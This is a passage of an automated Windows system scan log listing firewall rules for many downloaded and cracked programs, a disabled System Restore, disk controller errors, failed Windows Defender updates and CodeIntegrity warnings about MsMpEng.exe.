FirewallRules: [UDP Query User{6002DF46-D0C0-4D0D-A7CF-623A681197EA}E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Block) E:\free software programs\program file (x86) free torrent download dvdsoft\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [TCP Query User{BB8345BC-ECD7-4471-B25A-9D853E961F5A}C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [UDP Query User{7FC4D6EF-81C4-458F-9B40-AD7B400A1E4C}C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [TCP Query User{BC5A050A-5C0E-454E-A679-0B6F74B6AEEB}E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [UDP Query User{06AE2A0A-79C9-42E3-8D44-832B7E14FA66}E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) E:\free software programs\presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [{C1CDE395-B54A-41F5-8253-D1C74388EEBD}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe
FirewallRules: [{4C545804-7C07-4B6F-B73F-E447437D340D}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe
FirewallRules: [TCP Query User{F025769D-FD8B-45D2-A905-50841DDDB59B}C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe] => (Allow) C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe
FirewallRules: [UDP Query User{B22891B0-0B73-4385-81F5-B178F881D091}C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe] => (Allow) C:\program file (x86) allmytube wondershare\allmytube\allmytube.exe
FirewallRules: [{A879E9E7-D547-4AB8-9183-31F47DA82E93}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsb7AC7.tmp\CnetInstaller-75409715.exe
FirewallRules: [{5452DD3B-F6A9-4B86-856D-2147672734F5}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsb7AC7.tmp\CnetInstaller-75409715.exe
FirewallRules: [{2029387B-0B9A-48C5-8D70-D9624A75818D}] => (Allow) C:\Program File (x86) Free Video To MP3 Converter DVDVideoSoft Three UpDate\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{23995299-1FD2-4CFE-B8AF-2086099394E8}] => (Allow) C:\Program File (x86) Free Video To MP3 Converter DVDVideoSoft Three UpDate\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{0DD782B8-3E36-4357-B248-4A58956BA95E}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsm3630.tmp\CnetInstaller-10444774.exe
FirewallRules: [{3435D53E-9FD6-4668-BF9A-6D30B08E5FEE}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsm3630.tmp\CnetInstaller-10444774.exe
FirewallRules: [{FF5E24B4-1562-4D0E-B0F0-B909F14E18B7}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsqF114.tmp\CnetInstaller-10444774.exe
FirewallRules: [{FBB98ABC-9569-4C9B-ACD7-72394C22E85A}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsqF114.tmp\CnetInstaller-10444774.exe
FirewallRules: [{7D2A9822-B4AC-4027-8630-BBA86B2B3250}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsnD7EB.tmp\CnetInstaller-75449917.exe
FirewallRules: [{B61AADD3-2D37-49CE-8846-3DBE50FB4B8A}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsnD7EB.tmp\CnetInstaller-75449917.exe
FirewallRules: [{2DA2B986-7667-4D2C-9E85-C2F81B954DE6}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsw2542.tmp\CnetInstaller-10875190.exe
FirewallRules: [{2FE73EE5-6FB3-4DC8-9CFF-B1AD59033BDD}] => (Allow) C:\Users\Dan\AppData\Local\Temp\nsw2542.tmp\CnetInstaller-10875190.exe
FirewallRules: [TCP Query User{5AC03A41-337A-4D35-8475-DBF7FCF3718C}C:\program file (x86) vlc media player videolan\vlc\vlc.exe] => (Block) C:\program file (x86) vlc media player videolan\vlc\vlc.exe
FirewallRules: [UDP Query User{3A9F9831-57E1-4FDB-984D-672AA8256557}C:\program file (x86) vlc media player videolan\vlc\vlc.exe] => (Block) C:\program file (x86) vlc media player videolan\vlc\vlc.exe
FirewallRules: [{57579DAD-B0A7-4600-BACB-ACFBD0BF582E}] => (Allow) C:\Program File (x86) 4kYoutubetomp3TWO\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [{20046B7C-7FC0-4DAC-81CD-B157DC013E33}] => (Allow) C:\Program File (x86) 4kYoutubetomp3TWO\DVDVideoSoft\Free Torrent Download\FreeTorrentDownload.exe
FirewallRules: [TCP Query User{210A33E9-6B2B-44CF-BCF6-D34BC763A901}C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [UDP Query User{BC1DE14B-4640-475C-A83B-879941C715F5}C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe] => (Allow) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [{207663F4-14AA-4B8C-8B75-0E34AECA606F}] => (Block) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [{5F89233A-ABDC-4FF1-9263-2D96AFE62121}] => (Block) C:\program file (x86) dvdsoft  two - free studio package\dvdvideosoft\free torrent download\freetorrentdownload.exe
FirewallRules: [TCP Query User{803AE086-7E6A-48E0-8802-785AA4FC4A01}C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe] => (Allow) C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe
FirewallRules: [UDP Query User{DD0732C4-EE26-4E6D-9566-D42C50E770DC}C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe] => (Allow) C:\program file (x86) frostwire 6 - torrent & music downloader\frostwire 6\frostwire.exe
FirewallRules: [{92D3E127-A9C9-4A57-A4DE-C37C30EEC069}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\Video Download Capture.exe
FirewallRules: [{6D97C59F-C2D5-4B5F-A2EB-62DED9A63774}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\Video Download Capture.exe
FirewallRules: [{595BE6ED-4AE7-4E50-8492-81EF52DC503B}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftSrv.dll
FirewallRules: [{51406614-36DB-4932-854C-7354C320CCCE}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftSrv.dll
FirewallRules: [{0FD1A6F0-6892-4528-8D02-6DA308CE78B8}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDump.dll
FirewallRules: [{F5C52100-551E-41EB-9F6B-22785A10B72E}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDump.dll
FirewallRules: [{F90CFC89-D1E5-47FE-810D-4C2A003E3EC4}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftAC.dll
FirewallRules: [{B4D1EF72-3517-40C5-A216-D67E59703BD4}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftAC.dll
FirewallRules: [{95D8704A-2EE2-4ABF-A286-E107F9FE797F}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftPlayer.dll
FirewallRules: [{4819C0F7-D28C-465D-9F1B-E02D925E86AE}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftPlayer.dll
FirewallRules: [{FC9BC8BE-3785-41F0-9673-77798F53F411}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDownloaderHelp.dll
FirewallRules: [{97D423F4-0FDF-4C9C-9062-3118615A659E}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftDownloaderHelp.dll
FirewallRules: [{F3617F33-975E-49A1-82F7-525FC3550128}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftHDSDump.dll
FirewallRules: [{A279D673-8345-423B-A713-D33AE6388178}] => (Allow) C:\Program File (x86) ApowerSoft Video Download Capture\Video Download Capture\ApowersoftHDSDump.dll
FirewallRules: [{2AC43D62-7AC9-47C0-9BAF-E92B1B7BBA30}] => (Allow) C:\Users\Dan\AppData\Local\Temp\Andy_45.5_x64\Setup.exe
FirewallRules: [{C12F076D-5E2B-450E-91A2-3D08D18E1937}] => (Allow) C:\Users\Dan\AppData\Local\Temp\Andy_45.5_x64\Setup.exe
FirewallRules: [{3D3CF842-8298-442A-B9C9-A5399B012E71}] => (Allow) C:\Program Files\Andy\andy.exe
FirewallRules: [{C31226E6-F861-4DEA-B2FD-2634BE6F0129}] => (Allow) C:\Program Files\Andy\andy.exe
FirewallRules: [{D12533D4-1609-4FAF-85BD-3A23601A19D7}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{C02EE326-2CB8-4B8B-85EE-B9EF5101D2FC}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{E6F43DE1-5773-4F5C-997C-8F9A152B8CC6}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{4A1A6E79-2801-44AC-93C6-A5698676BF58}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{447CC466-EC34-4DCC-9474-38A417083D49}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [{B6E8D305-52B5-45E2-8C5A-2EE37A8ADB44}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [{0649CB28-67B5-48B4-B97E-CDA231670A45}] => (Allow) C:\Program Files\Andy\HandyAndy.exe
FirewallRules: [{5BAD7087-DE25-4030-A16A-578CD107BD81}] => (Allow) C:\Program Files\Andy\HandyAndy.exe
FirewallRules: [{BF1E40F5-A2D7-4946-895B-E0067521547F}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser - NEW Ver\Winamp\winamp.exe
FirewallRules: [{17ED7A00-1D80-4074-B1AB-25880A7BB6B6}] => (Allow) C:\Program File (x86) WINAMP Radio & Music Player Browser - NEW Ver\Winamp\winamp.exe
FirewallRules: [TCP Query User{396BBCA8-02CB-4338-8B42-915ECADCD922}C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [UDP Query User{73E87333-E910-4EEC-804C-17612FDD0764}C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe] => (Allow) C:\program file (x86) presonus studio one 2 free multitrack recorder\program file (x86) presonus studio one 2 multitrack recorder free\studio one 2\studio one.exe
FirewallRules: [{9E3E9781-622A-4CDF-A7EF-F851961BEA19}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
FirewallRules: [{7C52A72D-17FC-484E-A819-81F527082F0F}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\Resolve.exe
FirewallRules: [{5B94E67F-A6E7-4C37-B249-3CED37E49F0D}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\bmdpaneld.exe
FirewallRules: [{BA3F2295-A446-4372-A933-C67E6917CAA9}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\JLCooperPanelDaemon.exe
FirewallRules: [{AF2811BE-4318-4F7F-8F60-8E10AD92B8F2}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\EuphonixPanelDaemon.exe
FirewallRules: [{9D04EBDE-0FDE-4918-94E4-D40C3C002C6F}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\TangentPanelDaemon.exe
FirewallRules: [{BDA720FB-BED0-4342-84C3-1AF5017ECCAA}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\ElementsPanelDaemon.exe
FirewallRules: [{56DE631C-A030-4DF6-B707-2D24656517FF}] => (Allow) C:\Program File (x86) Davinci 12.5 Beta Video Edting Software\DPDecoder.exe
FirewallRules: [{B0D56FFA-C1C5-488E-B442-2038AC05A5A6}] => (Allow) C:\ProgramData\Blackmagic Design\DaVinci Resolve\Support\QtDecoder\QTDecoder.exe
FirewallRules: [TCP Query User{80D1B33D-1849-4BEE-B7BB-78C9D2D3F544}C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe] => (Block) C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe
FirewallRules: [UDP Query User{B40DADB6-9E25-4951-B741-8458BE0396EE}C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe] => (Block) C:\program file (x86) davinci 12.5 beta video edting software\dpdecoder.exe
FirewallRules: [{9B19D861-CA78-446B-AD40-2E9AA11FDFB5}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\VideoEditor.exe
FirewallRules: [{9A1FF358-15BA-4495-8972-7D4A585582FE}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\VideoEditor.exe
FirewallRules: [{DFD16930-C6D4-42A7-8594-A07EAE59D209}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\Updater.exe
FirewallRules: [{96FED481-82D0-450B-85C3-36735EB1549F}] => (Allow) C:\Program File (x86) VSDC Video Editor - Free\FlashIntegro\VideoEditor\Updater.exe
FirewallRules: [{17F50D30-FD50-46D0-BEE3-81847CF40C64}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶睜湩晤湩層楷摮楦摮攮數
FirewallRules: [{96606CA1-E101-4434-AE0C-6C99B774D1CA}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶睜湩晤湩層楷摮楦摮⹟硥e
FirewallRules: [{D61EF620-8F0B-40A6-9BB7-E836DA310B7C}] => (Block) %SystemDrive%\Program File (x86) Adobe Premiere Pro CC - 2 - (Program)\Adobe Premiere Pro CC 2015\Adobe Premiere Pro.exe
FirewallRules: [{91606396-6288-43E6-AE6F-EEB421C75181}] => (Block) %SystemDrive%\Program File (x86) Adobe Premiere Pro CC - 2 - (Program)\Adobe Premiere Pro CC 2015\Adobe Premiere Pro.exe
FirewallRules: [{807550B5-7265-4327-9B16-266D34A7742C}] => (Block) %SystemDrive%\Program File (x86) Adobe After Effects CS6 - Video EfXs Program 2\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{EE7BB404-A2CF-4E23-A355-EA7C2D953145}] => (Block) %SystemDrive%\Program File (x86) Adobe After Effects CS6 - Video EfXs Program 2\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{7C716CAC-0CA5-496D-B6B1-DBB04F82E573}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{047E31DF-A255-4F4C-9FE9-45DD54A3AB3B}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{B06B32BA-F38C-4C17-B422-99E7605B0063}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{E511541B-CD44-4376-A542-B6A6578FA8EE}] => (Block) %ProgramFiles%\Adobe\Adobe After Effects CC 2015.3\Support Files\AfterFX.exe
FirewallRules: [{068BAA54-B58F-43B6-8ADB-31E4DEE03ACC}] => (Block) %ProgramFiles%\Adobe\Adobe Media Encoder CC 2015.3\Adobe Media Encoder.exe
FirewallRules: [{B44756B4-DFCA-4CC9-953C-CCE8AE6CC11A}] => (Block) %ProgramFiles%\Adobe\Adobe Media Encoder CC 2015.3\Adobe Media Encoder.exe
FirewallRules: [{3C331E6B-E428-4D0C-BEA4-0FA06032B9D0}] => (Block) %ProgramFiles% (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{D450C4CE-50CA-4D6B-A47C-AF19379507B1}] => (Block) %ProgramFiles% (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe
FirewallRules: [{640DFB21-833E-420D-B80D-AC0DD899B614}] => (Allow) C:\Program Files (x86)\SrpnFiles\SrpnFiles.exe
FirewallRules: [{6CAA584E-EA21-4F97-9554-1E5312569977}] => (Allow) C:\Program Files (x86)\SrpnFiles\SrpnFiles.exe
FirewallRules: [{099E93F9-CFBA-4E6D-A852-0EFDF6E69C77}] => (Allow) C:\Program Files (x86)\SrpnFiles\downloader.exe
FirewallRules: [{10B74A86-9FC5-4D84-955B-4B2C2FAADC83}] => (Allow) C:\Program Files (x86)\SrpnFiles\downloader.exe
FirewallRules: [{65FA2FF6-971C-44E8-8D5E-C565539E0181}] => (Block) %SystemDrive%\Program File (x86) CrazyTalk Animator 2 Pipeline 8.03.1620.1 + Crack [SadeemPC]\CrazyTalk Animator 2\CrazyTalk Animator 2\CrazyTalkAnimator.exe
FirewallRules: [{88078A39-6DBF-4310-9720-BC7A9811094B}] => (Block) %SystemDrive%\Program File (x86) CrazyTalk Animator 2 Pipeline 8.03.1620.1 + Crack [SadeemPC]\CrazyTalk Animator 2\CrazyTalk Animator 2\CrazyTalkAnimator.exe
FirewallRules: [{5D12474E-76BE-4D8A-8BD7-4CECA0F32CFB}] => (Allow) C:\Users\Dan\AppData\Local\Kometa\Application\kometa.exe
FirewallRules: [{814CAEF2-ADD6-4507-BAE2-55F6820A7994}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶䝜湥牥捩桳楡汬屩敇敮楲獣慨汩楬攮數
FirewallRules: [{0E3753F1-E381-437A-BC70-0B47ECA113FA}] => (Allow) 㩃停潲牧浡䘠汩獥⠠㡸⤶䝜湥牥捩桳楡汬屩敇敮楲獣慨汩楬⹟硥e
FirewallRules: [{8269955E-0B8F-464C-B326-2023E770CABC}] => (Allow) C:\Program Files (x86)\Henwood\fontenot.exe
FirewallRules: [{3606180A-FA39-4B14-88F6-E879C8BB4B0B}] => (Allow) C:\Program Files (x86)\Police\fontenot.exe
FirewallRules: [{99FAD6CC-61D4-4806-B204-7F3641DDD7F3}] => (Block) %ProgramFiles% (x86)\FaceGen\Artist Pro\fgArtistPro.exe
FirewallRules: [{6CCE0F5A-ED5B-48E9-898C-B3168715BED1}] => (Block) %ProgramFiles% (x86)\FaceGen\Artist Pro\fgArtistPro.exe
FirewallRules: [TCP Query User{9536F0CC-5E66-46E8-805B-67D9697C530F}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [UDP Query User{C5258519-221C-4A37-A687-51526258F672}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe
FirewallRules: [{5507329C-601E-4572-9AD8-6C16774E1ADC}] => (Allow) C:\Program File (x86) Firefox Web Browser Mozilla\firefox.exe
FirewallRules: [{187A8271-92D7-449D-8643-56ECD2671F9C}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{C260D9CD-8DD2-4B5A-8BDE-C4CFD01C9F25}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [TCP Query User{DB1E8DAE-0016-43D8-BB69-DC8005FC9089}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [UDP Query User{EA5A15E3-2AE2-47A4-AB76-6A52AAB47F97}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe
FirewallRules: [{31F2912A-119F-44BD-A9EB-53A4D506D23B}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Restore Points =========================
 
ATTENTION: System Restore is disabled
 
==================== Faulty Device Manager Devices =============
 
Name: 
Description: 
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (06/11/2018 09:42:03 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 7c4
 
Start Time: 01d401edd725fe22
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: ca66cabd-6de1-11e8-835b-10c37bbb446b
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (06/11/2018 08:58:06 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program LiveComm.exe version 17.5.9600.20911 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 894
 
Start Time: 01d401e7b235f644
 
Termination Time: 4294967295
 
Application Path: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe\LiveComm.exe
 
Report Id: a65dd9f3-6ddb-11e8-8359-10c37bbb446b
 
Faulting package full name: microsoft.windowscommunicationsapps_17.5.9600.20911_x64__8wekyb3d8bbwe
 
Faulting package-relative application ID: ppleae38af2e007f4358a809ac99a64a67c1
 
Error: (06/11/2018 08:45:56 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-19T00:45:56Z. Error Code: 0x80070020.
 
Error: (06/11/2018 08:45:44 PM) (Source: Windows Search Service) (EventID: 1019) (User: )
Description: Windows Search Service failed to process the list of included and excluded locations with the error <20, 0x80070020, "">.
 
Error: (06/11/2018 08:45:26 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-19T00:45:26Z. Error Code: 0x80070020.
 
Error: (06/11/2018 08:44:56 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-19T00:44:56Z. Error Code: 0x80070020.
 
Error: (06/11/2018 08:44:26 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-19T00:44:25Z. Error Code: 0x80070020.
 
Error: (06/11/2018 08:43:55 PM) (Source: Software Protection Platform Service) (EventID: 16385) (User: )
Description: Failed to schedule Software Protection service for re-start at 2118-05-19T00:43:55Z. Error Code: 0x80070020.
 
 
System errors:
=============
Error: (06/11/2018 09:55:02 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/11/2018 09:55:02 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/11/2018 09:55:02 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/11/2018 09:55:02 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/11/2018 09:55:02 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/11/2018 09:55:01 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/11/2018 09:55:01 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
Error: (06/11/2018 09:55:01 PM) (Source: disk) (EventID: 11) (User: )
Description: The driver detected a controller error on \Device\Harddisk0\DR0.
 
 
Windows Defender:
===================================
Date: 2015-02-02 09:49:52.792
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {4BF9AF7B-A43D-4E64-B277-DEFB56CDC0E3}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-02-02 08:06:18.260
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {16FD4F1F-550C-4A26-9400-0412629CFD5A}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-02-01 10:17:58.118
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {BADC4EF7-6BAD-444C-AB05-92085B6CF93D}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-02-01 08:23:26.263
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {C9B87AF6-96B3-4644-9422-EB0CED28391C}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-01-31 08:30:36.872
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {4D8C80CB-F50C-47EE-94E8-DC02EC0EE056}
Scan Type: Antimalware
Scan Parameters: Quick Scan
 
Date: 2015-02-01 05:57:28.954
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 110.6.0.0
Update Source: Microsoft Malware Protection Center
Signature Type: Network Inspection System
Update Type: Full
Current Engine Version: 
Previous Engine Version: 2.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved 
 
Date: 2015-02-01 05:57:28.938
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.167.387.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiSpyware
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved 
 
Date: 2015-02-01 05:57:28.938
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.167.387.0
Update Source: Microsoft Malware Protection Center
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved 
 
Date: 2015-02-01 05:57:28.844
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 1.167.387.0
Update Source: Microsoft Update Server
Signature Type: AntiVirus
Update Type: Full
Current Engine Version: 
Previous Engine Version: 1.1.10302.0
Error code: 0x8024402c
Error description: An unexpected problem occurred while checking for updates. For information on installing or troubleshooting updates, see Help and Support. 
 
Date: 2015-01-30 05:22:07.607
Description: 
Windows Defender has encountered an error trying to update signatures.
New Signature Version: 
Previous Signature Version: 110.6.0.0
Update Source: Microsoft Malware Protection Center
Signature Type: Network Inspection System
Update Type: Full
Current Engine Version: 
Previous Engine Version: 2.1.10302.0
Error code: 0x80072ee7
Error description: The server name or address could not be resolved 
 
CodeIntegrity:
===================================
 
Date: 2018-06-11 21:40:11.899
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-11 21:18:22.725
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-11 20:52:06.834
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-11 20:17:14.808
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-10 20:22:12.478
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-09 19:37:48.069
Description: 
Windows is unable to verify the image integrity of the file \Device\HarddiskVolume4\Program Files\Windows Defender\MsMpEng.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
Date: 2018-06-08 20:23:26.515
Description: 
